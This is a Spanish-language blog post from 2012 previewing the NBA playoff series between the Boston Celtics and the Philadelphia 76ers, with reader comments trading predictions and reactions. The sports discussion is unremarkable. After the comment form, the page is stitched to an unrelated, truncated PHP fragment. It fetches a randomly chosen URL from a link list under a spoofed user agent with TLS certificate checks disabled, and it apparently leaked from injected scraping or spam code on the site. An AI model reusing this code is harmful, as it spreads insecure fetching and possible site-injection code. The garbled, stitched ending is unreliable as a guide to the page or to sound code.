Análisis: Boston Celtics (4) vs Philadelphia 76ers (8)

12 de May de 2012 por Esteban

Regular: 1-2

Celtics: 91.9 PF – 89.3 PC
Sixers:  93.6 PF – 89.4 PC

Me resulta extremadamente difícil analizar previamente esta eliminatoria. Primero porque creo en el fondo de mi corazón que los 76s no se merecen estar aquí, y creo que si escarbo más profundo aún, quizá piense que ni se merecían estar en PO, aunque elllo sería menospreciar su gran primera parte de temporada en la que mantuvieron por largo tiempo el tercer puesto. Y segundo, porque aunque creo que los Celtics no tendrán mayores problemas en pasar la eliminatoria, también tengo la sensación de que estos tampoco se merecen estar en final de conferencia.

En fin, de aquí saldrá un finalista para jugar nada menos que contra el Heat. Dos equipos que llegan gracias a las lesiones de sus rivales (Rose, Noah, Smith y Horford pueden dar fe de ello) más que por grandes méritos propios.

En principio los Celtics deberían barrer la serie por el solo hecho de tener a Rajon Rondo. Pero si a este le sumamos al nuevo Garnett de pívot, a “La Verdad” y a un recuperado Ray Allen, y enfrente el jugador franquicia es Andre Iguodala, la serie debería ser una paliza de punta a punta.

De los 76s poco podemos decir después de su choque con los Bulls. Partidos de 80 puntos, polémicos arbitrajes, peleas entre los jugadores… Simplemente fueron los menos malos y mas allá de lo bueno aportado por Turner, Hawes y Holiday me parece una falta de respeto decir que son jugadores de los cuales los Celtics deben cuidarse. Simplemente no están a la altura.

De los Celtics la serie pasada nos deja algunas cosas para analizar, como los minutos jugados por Ryan Hollins. Su capacidad para terminar alley-ups le esta dando minutos en el equipo. Pareciera poco, pero a excepción de él y Bass no hay jugador en todo Boston que pueda atacar el aro con esa energía, lo que demuestra un poco la falta de piernas, que a estas alturas puede pasar algo de factura a los verdes.

Claves de la  eliminatoria

– Segundas unidades: aquí es el único lugar donde los 76s pueden sacar algo de ventaja, sobretodo si Jodie Meeks vuelve al inicial y Turner sale de la banca. Él y Louis Williams pueden aportar solos más que toda la banca de Boston (con perdón de Ray Allen si sigue saliendo desde el banco y se recupera plenamente de sus problemas físicos)

– Que el Big 4 sea Big 4: se les llama los cuatro grandes pero uno de ellos !SALE DEL BANCO!  Ray Allen jugó solo cuatro partidos de la eliminatoria pasada y poco hace suponer que este en condiciones óptimas para jugar toda esta. Incluso su último juego no fue algo para recordar. Con una buena versión de él la serie está definida. Ahora, si se lesiona o esta errático, el Big 4 pasa a ser Big 3 y las cosas no están ya tan claras.

– El hambre o La Experiencia: habrá que ver que se impone. Yo me la juego por la experiencia pero las jóvenes piernas de los 76s y sobre todas las cosas, la sensación de estar jugando “de regalo” y sin nada que perder, puede darles ciertas ventajas (tipo el Magic en el primer juego frente a Pacers). Sucede que enfrente están los Celtics que dudo que se dejen presionar por ser favoritos.

Pronóstico

Si en la foto de un lado tienes a Rondo, Allen, Pierce y Garnett y su contra frente es Andre Iguodala, la serie es un 4-0, pero creo que los Celtics dejarán un partido en Philadelphia, para ser más precisos el cuarto. 4-1.

Comenta

9 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Muy optimista el pronóstico. El análisis es bueno, pero creo que estás dando razones de más para no ver una barrida. Dices que el banquillo de los Celtics es inexistente, y efectivamente lo es, además de que Celtics deben pagar la acumulación de partidos más que los Sixers, aunque no han tenido que viajar para el primer partido y Sixers sí. Hollins no tiene nivel y Bradley no ha estado demasiado fino. Sixers tiene muy buen juego interior, y ahí deben intentar desgastar a Garnett, que tendrá mucho más trabajo en esta eliminatoria. Hawes le va a sacar de la guarida y con eso creo que Sixers pueden cargar mejor el rebote ofensivo con especialistas como Iguodala, y diría que Brand puede aprovecharlo también. Además pueden rotar con intensidad y seguir cargando dentro con Young y seguir sacando al menos un pivote fuera con Vucevic. Es lo bueno de estos Sixers, que tienen mil jugadores todos de medio nivel y que van a desgastar mucho el estático de los Celtics. Subirán de los 90 puntos y si Holiday es capaz de frenar en parte a Rondo, puede haber algún cortocircuiot grave en el ataque de los Celtics, que necesitarán a todos sus jugadores al máximo, y eso es complicado porque no pueden rotar con demasiadas garantías. Sixers son superiores en juego interior y banquillo, lo cual les hace favoritos al menos para llevarse dos partidos en casa. Boston intentará mantener impoluta su ventaja de campo y merendarse por 4-1 o 4-2 la eliminatoria, pero nunca 4-0. Yo me inclino por el 4-2, pero algo me dice que habrá séptimo partido… Es lo que dices tú, ambos equipos no esperaban pasar de primera ronda, esto es un regalo y será experiencia contra hambre. Sin duda Sixers pondrán más dificultades que Hawks. Venga, yo me la juego y digo que 4-3, confío en que irán al séptimo

      Citar

  2. txusma dice:
    #2

    Tengo que dejar aquí mi pronóstico, no sea que luego Sancho diga que no encuentra lo q dije: 4-1 para Celtics.

      Citar

  3. rumbero dice:
    #3

    Yo visto el partido de hoy digo un 4-2. Creo que la veterania y Rondo + una buena version de Garnett o Pierce les puede valer. No tienen piernas para correr pero son suficientemente listos como para llevar el partido donde los interesa, y ahi los Sixers no creo que esten en condicion de ganarlos. Lo de Garnett es para disfrutarlo. Vaya partidos lleva el amigo. Y Rondo me quita la idea de que Paul es el mejor base de la liga cuando juega asi.

      Citar

  4. GreenPride dice:
    #4

    Eliminatoria que muchos no esperaban pero que se ha dado por las circunstancias de las lesiones de los Bulls. No estoy de acuerdo ni mucho menos en que los Celtics deban su clasificación a las lesiones de Smith y Horford que han jugado en su serie mermados igual que dos hombres tan importantes como Pierce y Allen lo han hecho en los Celtics. Con todos sanos en ambos equipos creo que los Celtics también habrían pasado y son merecedores de estar en esta ronda.
    Una vez dicho esto no veo un pronóstico tan fácil como 4-1 para Boston por una razón fundamental, las piernas. Los Sixers son un equipo muy físico y los Celtics muy veteranos y la fuerza de los Sixers les va a hacer sufrir.
    Para mí las claves son que Rondo consiga imponer el ritmo pausado de los Celtics al ritmo rápido de Philly, que Pierce y Allen puedan jugar en buenas condiciones la serie entera y que Garnett siga merendandose pinturas y al juego interior de los Sixers. Para los Sixers Iguodala tendría que sobrepasar el rendimiento de Pierce, que sus interiores paren a Garnett e imponer su ritmo rápido para fundir a Boston.
    Creo que Boston sufrirá en casi todos los partidos pero con ventaja campo no se le escapará la eliminatoria y acabará ganando en 6 o 7

      Citar

  5. Sancho88 dice:
    #5

    Sixers empatan la serie y se la llevan a Philadelphia con ventaja de campo ahora a su favor. Si hacen las cosas bien, podrían poner contra las cuerdas a los Celtics con el 1-3 si logran no fallar en casa, aunque yo creo que la serie saldrá de Philadelphia empatada a 2. Esteban, te equivocaste de plano en el pronóstico, no así en el análisis, como ya te dije. No sé como con el análisis tan certero que habías hecho, en el cual se demostraba que Sixers iban a dar muchísima guerra, vas y pones un 4-0 o 4-1… la serie va a ser larga segurísimo y Sixers van a dar guerra hasta el final. Boston siguen siendo claros favoritos pero esto tiene pinta de ser molto longo…

    Resumen del partido: Celtics anotando guiados por las asistencias de Rondo y el talento de Allen, y Philadelphia resistiendo gracias a una buena defensa y a los bemoles de Holiday. Ale, a ver si decís mañana que es un paquete tirando a canasta, como casi siempre. Siempre cuando la caga, pum, Holiday vuelve a marcarse su 3/13 particular, pero esta noche se ha marcado 4 triples y un 50% en tiros de campo, y no es precisamente de los que tiran debajo de la canasta… ale, a ver si lo decís también. Hay una ola de desprestigio en los blogs y páginas de NBA contra Holiday impresionante, aunque el chaval no lo merece. Bueno, pues eso, Holiday aguantando el tipo y Turner decidiendo al final desde la línea de tiros libres.

    Conclusión: hay mucha igualdad en esta serie, seguramente decidirán los Celtics por veteranía y experiencia en estas batallas, hay una campaña de desprestigio y de ‘paquetizar’ a un buen equipo como Philadelphia, que tuvo una segunda parte de temporada más floja que la primera, pero que desde luego es un gran equipo, y espero que con la misma fuerza que les soléis criticar, mañana salte alguna loa positiva (que no creo) hacia Holiday y sus compañeros.

    Ale, a ver a los Lakers que hoy estoy en plan valiente y sin dormir. Cuando llegan semis o finales de conferencia y están Lakers en la pista me veo todos sus partidos. No soy aficionado pero sí simpatizante, sobre todo por Pau. Para lo bueno y para lo malo, suscitan todos los debates. Solo hay que ver que sus análisis son los más comentados

      Citar

  6. Esteban dice:
    #6

    Sancho, le eh errado si, cuando hice el analisis, me parecio q seria algo parecido a pacers heat, donde el debil iria ganando los juegos buena parte del partido, pero al final siempre terminaroia perdiendo, no imagino a nadie de los sixes cerrando partidos

    Pero creo q no eh subestimado a 76s, sobrevalore a los celtics, q parecen estar acabados, cualquiera de los dos q llegue contra el heat se enfrentara a una barrida, una pena los cruces, creo q los pacers hubiesen ganado esta eliminatoria contra boston o los 76s y harian una mejor final de conferencia

    Como ya eh dicho, la banca de los celtics da pena, y su big 4 esta cerca de ser big 1 por ronde y los coletazos q pueden dar pierce y garnett, aunque cada vez menos jugando tan seguido

      Citar

  7. Sancho88 dice:
    #7

    a ver Esteban, coincido en que Boston tiene una mierda de banquillo, pero sus cuatro figuras son figurones. Un partido bajo de Pierce y Garnett y ya les estás retirando, con la pedazo de serie contra los Hawks que han hecho? Sí, la carga de partidos y todo eso les pesa, pero siguen siendo favoritos en la serie. Te molan los power rankings estos que bajan y suben del 1 al 10 en una sola noche no? jejej, y sí, coincido contigo en que Heat-Pacers es la final anticipada del Este

      Citar

  8. Esteban dice:
    #8

    Jajaja no para tanto como retirarlos pero si q ya no estan para un 4 a 0, sigo creyendo q ganaran la serie, robaran uno de visitante y ganaran los dos de local q le quedaran, pero no mas q eso

    Yo q rivers meto mas en cancha a pavlovic q si bien es un muerto aun puede meter algun triple, y eso es mas q lo q puede hacer la banca de boston en totalidad con exepcion de allen,
    Otra alternativa es salir con hollins en el lugar de bass, el tio es un cabeza fresca, pero puede daltar y con rondo en cancha eso puede vlaer puntos, mientras q bass daria energia a la segunda unidad celta

    Mas por hacer no tienen, igual creo q sus grandes sacaran la serie adelante, pero la carga de juegos, sumados a su flojo nivel, los deja sin opciones de ganarle un juego al heat

      Citar

  9. Sancho88 dice:
    #9

    Bueno, habrá que ver cómo gestionan los Heat la baja de Bosh, igual nos llevamos alguna sorpresa mayúscula en la eliminatoria contra Pacers, aunque no creo, y luego en la final, hombre, creo que rosco rosco no, pero huele 4-1 contra Celtics. De todas maneras, date cuenta que ahora los Heat tinene que tirar hasta el final de los finales apoyadísimos en gestas heroicas de Lebron y Wade… alguna sorpresa puede saltar por ahí…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>